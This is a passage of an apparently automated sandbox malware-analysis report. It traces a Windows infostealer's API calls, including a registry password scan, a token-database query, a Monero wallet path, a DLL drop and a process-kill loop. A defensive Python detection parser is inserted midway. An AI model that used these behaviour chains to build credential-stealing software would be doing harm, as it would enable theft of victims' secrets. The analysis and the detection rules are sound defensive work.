                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2356445960-393685449
                          • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                          • Instruction ID: 29296ba2ddacb06b9ea6b63f42aa04cd5b3c241e2f39aa38b45738dfd55a0363
                          • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                          • Instruction Fuzzy Hash: 41B1577180120DEFCF25DFE4C885AAEBBB5BF1A310F14416AE9156B212D731EE51CB91
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0002739A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00027411
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0002746D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 000274B2
                          • HeapFree.KERNEL32(00000000), ref: 000274B9
                          • task.LIBCPMTD ref: 000275B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: ebc68716df4ebba032fa9239341cadf7036846247770f340c4a5ac698c76066b
                          • Instruction ID: 00e706a23083b63db687177f799a9528b51141a6258ee152811fcbc3d573ae1b
                          • Opcode Fuzzy Hash: ebc68716df4ebba032fa9239341cadf7036846247770f340c4a5ac698c76066b
                          • Instruction Fuzzy Hash: D8610BB59041689BDB24DF50DC55FEAB7B8BF48300F0085E9E649A6142EFB06BC9CF90
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • lstrlen.KERNEL32(00000000), ref: 0002BC6F
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0002BC9D
                          • lstrlen.KERNEL32(00000000), ref: 0002BD75
                          • lstrlen.KERNEL32(00000000), ref: 0002BD89
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: a88181a02b255a2aea360960134c61224815f4907deae8beaf97e3ce89f62b27
                          • Instruction ID: 529e8b8f0979dd3b3d537e67986d24c3f310dc416f5ab3e4ad58652399167a63
                          • Opcode Fuzzy Hash: a88181a02b255a2aea360960134c61224815f4907deae8beaf97e3ce89f62b27
                          • Instruction Fuzzy Hash: 41B13272A101189BCF15FBA0DDA6EEEB33DAF55300F404568F54666193EF346A48CB72
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 9567c73410f85a032434e67812bf169da60661bb12bf5962d6d6619f7cf12e7c
                          • Instruction ID: 8bb244f900dba9c5bf6c7a9b87fd78612df874bec74aa9253d6346a8c69f1755
                          • Opcode Fuzzy Hash: 9567c73410f85a032434e67812bf169da60661bb12bf5962d6d6619f7cf12e7c
                          • Instruction Fuzzy Hash: 47F05E3090C209EFD3449FE4F80D7ADBB74EB04757F1181A5F60D96190C6714A60EF51
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00039850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,000308DC,C:\ProgramData\chrome.dll), ref: 00039871
                            • Part of subcall function 0002A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0002A098
                          • StrCmpCA.SHLWAPI(00000000,00FD9298), ref: 00030922
                          • StrCmpCA.SHLWAPI(00000000,00FD9148), ref: 00030B79
                          • StrCmpCA.SHLWAPI(00000000,00FD9208), ref: 00030A0C
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00030C35
                          Strings
                          • C:\ProgramData\chrome.dll, xrefs: 00030C30
                          • C:\ProgramData\chrome.dll, xrefs: 000308CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                          • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                          • API String ID: 585553867-663540502
                          • Opcode ID: 53425cae8beff00297983b40f27f38af81ae03e6c7b3a3afae032492d8bb78c0
                          • Instruction ID: 9d3b26ec1adf5280ce0d624e7b15cb63cbfd3c06a79b3b8fcf34c844cb57e0d3
                          • Opcode Fuzzy Hash: 53425cae8beff00297983b40f27f38af81ae03e6c7b3a3afae032492d8bb78c0
                          • Instruction Fuzzy Hash: 6CA137717001089FCB28EF64D996EED777AEF95300F50856DE84A9F252DB30DA05CB92
                          APIs
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                          • wsprintfA.USER32 ref: 00029E7F
                          • lstrcat.KERNEL32(00000000,?), ref: 00029F03
                          • lstrcat.KERNEL32(00000000,?), ref: 00029F17
                          • lstrcat.KERNEL32(00000000,000412D8), ref: 00029F29
                          • lstrcpy.KERNEL32(?,00000000), ref: 00029F7C
                          • Sleep.KERNEL32(00001388), ref: 0002A013
                            • Part of subcall function 000399A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000399C5
                            • Part of subcall function 000399A0: Process32First.KERNEL32(0002A056,00000128), ref: 000399D9
                            • Part of subcall function 000399A0: Process32Next.KERNEL32(0002A056,00000128), ref: 000399F2
                            • Part of subcall function 000399A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00039A4E
                            • Part of subcall function 000399A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00039A6C
                            • Part of subcall function 000399A0: CloseHandle.KERNEL32(00000000), ref: 00039A79
                            • Part of subcall function 000399A0: CloseHandle.KERNEL32(0002A056), ref: 00039A88
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                          • String ID: D
                          • API String ID: 531068710-2746444292
                          • Opcode ID: 88beca3de0f874d86eb91083941e481b5116a0e4ac244c6656b6748d7afeffcd
                          • Instruction ID: c1e71de5d1cf21b98077ac8defab1c9485fbdcc93d1ac97b8f7762dcc3c1ec29
                          • Opcode Fuzzy Hash: 88beca3de0f874d86eb91083941e481b5116a0e4ac244c6656b6748d7afeffcd
                          • Instruction Fuzzy Hash: 545156B1944318ABEB25DB60DC4AFDA777CAF44704F004598B60DAB281EB75AB84CF51
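The function entries above expose four behaviours a detection engineer would want to pull out of this report automatically: the WinINet download that is written to disk (InternetOpenUrlA / InternetReadFile / CreateFileA / WriteFile), the HKCU registry walk that looks for values containing "Password" (RegEnumValueA / StrStrA), the drop, load and delete of C:\ProgramData\chrome.dll (CreateFileA / LoadLibraryA / DeleteFileA on the same path), and the Toolhelp32 process-kill loop with a 0x1388 (5000 ms) Sleep. The following parser is an added example and is not part of the Joe Sandbox report or of the sample: it reads the report's "APIs" bullet lines, groups them per function, and applies rules for those four chains plus a "download to memory only" variant for the second WinINet function. The rule names, the `Call` structure and the thresholds are this example's own choices; the `TRACE` input is constructed from API lines copied from the entries above, with the non-API lines (Strings, xrefs) left in to show they are ignored.

```python
"""Flag suspicious Win32 API chains in Joe Sandbox IDA-plugin function traces.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Parses "• [Part of subcall function ADDR: ]Name.MODULE(args), ref: ADDR"
bullets and labels each function with behaviour rules derived from the
entries in this report (download-to-disk, registry "Password" scan,
drop/load/delete of a DLL, process-kill loop). Rule names are hypothetical.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Call(NamedTuple):
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: bool  # True for "Part of subcall function ..." lines


API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[\w:=]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
WIN_PATH = re.compile(r"[A-Za-z]:\\[^,)\s]+")  # drive-letter paths inside args


def parse_functions(text: str) -> List[List[Call]]:
    """Split an excerpt into per-function call lists. A line reading exactly
    'APIs' starts a new function; Strings, xrefs and hash lines are skipped."""
    functions: List[List[Call]] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current is not None:
                functions.append(current)
            current = []
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.append(Call(m.group("name"), m.group("mod"), args,
                                m.group("ref"), m.group("sub") is not None))
    if current is not None:
        functions.append(current)
    return functions


def classify(calls: List[Call]) -> List[str]:
    """Behaviour labels for one function, from its API set and arguments."""
    names = {c.name for c in calls}
    findings = []
    if "InternetReadFile" in names:
        findings.append("download_to_disk" if {"CreateFileA", "WriteFile"} <= names
                        else "download_to_memory")
    if "RegEnumValueA" in names and any(
            c.name == "StrStrA" and any("password" in a.lower() for a in c.args)
            for c in calls):
        findings.append("registry_password_scan")
    paths = defaultdict(set)  # API name -> lower-cased paths seen in its args
    for c in calls:
        for a in c.args:
            paths[c.name].update(p.lower() for p in WIN_PATH.findall(a))
    if paths["CreateFileA"] & paths["LoadLibraryA"] & paths["DeleteFileA"]:
        findings.append("drop_load_delete_dll")
    if {"CreateToolhelp32Snapshot", "Process32Next", "TerminateProcess"} <= names:
        findings.append("process_kill_loop")
    return findings


def analyze(text: str) -> Dict[str, list]:
    """Per-function labels plus every drive-letter path seen in any argument."""
    functions = parse_functions(text)
    iocs = sorted({p for calls in functions for c in calls
                   for a in c.args for p in WIN_PATH.findall(a)})
    return {"functions": [classify(calls) for calls in functions], "paths": iocs}


# Constructed input: API bullets copied from the function entries in this report.
TRACE = r"""
APIs
  • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
  • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
• InternetOpenA.WININET(00040DFB,00000001,00000000,00000000,00000000), ref: 0002615F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000261DF
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00026203
• InternetReadFile.WININET(?,?,00000400,?), ref: 0002622C
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0002625A
• CloseHandle.KERNEL32(?,?,00000400), ref: 00026299
APIs
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0002739A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00027411
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0002746D
• task.LIBCPMTD ref: 000275B5
Strings
APIs
  • Part of subcall function 00039850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,000308DC,C:\ProgramData\chrome.dll), ref: 00039871
  • Part of subcall function 0002A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0002A098
• StrCmpCA.SHLWAPI(00000000,00FD9298), ref: 00030922
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00030C35
Strings
• C:\ProgramData\chrome.dll, xrefs: 00030C30
APIs
  • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
• Sleep.KERNEL32(00001388), ref: 0002A013
  • Part of subcall function 000399A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000399C5
  • Part of subcall function 000399A0: Process32Next.KERNEL32(0002A056,00000128), ref: 000399F2
  • Part of subcall function 000399A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00039A6C
APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002501A
• RtlAllocateHeap.NTDLL(00000000), ref: 00025021
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00025061
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00025091
"""

if __name__ == "__main__":
    report = analyze(TRACE)
    for i, labels in enumerate(report["functions"]):
        print(i, labels)
    print("paths:", report["paths"])
```

Subcall lines are kept on purpose: the chrome.dll drop is only visible because the CreateFileA and LoadLibraryA calls are reported as part of subcalls, while the DeleteFileA is in the function itself. Argument matching is done on the lower-cased path so that case differences between entries do not split one IOC into two; the `\Monero\wallet.keys` fragment is not a drive-letter path and is deliberately not reported.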
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 0009FA1F
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0009FA27
                          • _ValidateLocalCookies.LIBCMT ref: 0009FAB0
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0009FADB
                          • _ValidateLocalCookies.LIBCMT ref: 0009FB30
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                          • Instruction ID: 69e5939d38b8d654f40b121c61783e43f056d884084cc64ac4086b518e7f515b
                          • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                          • Instruction Fuzzy Hash: B2419270A0021AEBCF10DF68C884AEEBBF5BF49324F148165E818EB392D731D915DB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002501A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00025021
                          • InternetOpenA.WININET(00040DE3,00000000,00000000,00000000,00000000), ref: 0002503A
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00025061
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00025091
                          • InternetCloseHandle.WININET(?), ref: 00025109
                          • InternetCloseHandle.WININET(?), ref: 00025116
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 8252892ccb73cb0df9f2fcf3a745c08b731cd46193ec2a618d0a39d7993a62d6
                          • Instruction ID: 2a394ca3dd4465bfb7c8940e44031826b5825c1840cca3930df46dd43fc54b3e
                          • Opcode Fuzzy Hash: 8252892ccb73cb0df9f2fcf3a745c08b731cd46193ec2a618d0a39d7993a62d6
                          • Instruction Fuzzy Hash: 6731EEB4A44218ABDB20CF54DC85BEDB7B4AB48305F1081E9F709A7281D7706EC5CF99
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000385B6
                          • wsprintfA.USER32 ref: 000385E9
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0003860B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0003861C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00038629
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • RegQueryValueExA.ADVAPI32(00000000,00FDE440,00000000,000F003F,?,00000400), ref: 0003867C
                          • lstrlen.KERNEL32(?), ref: 00038691
                          • RegQueryValueExA.ADVAPI32(00000000,00FDE380,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00040B3C), ref: 00038729
                          • RegCloseKey.ADVAPI32(00000000), ref: 00038798
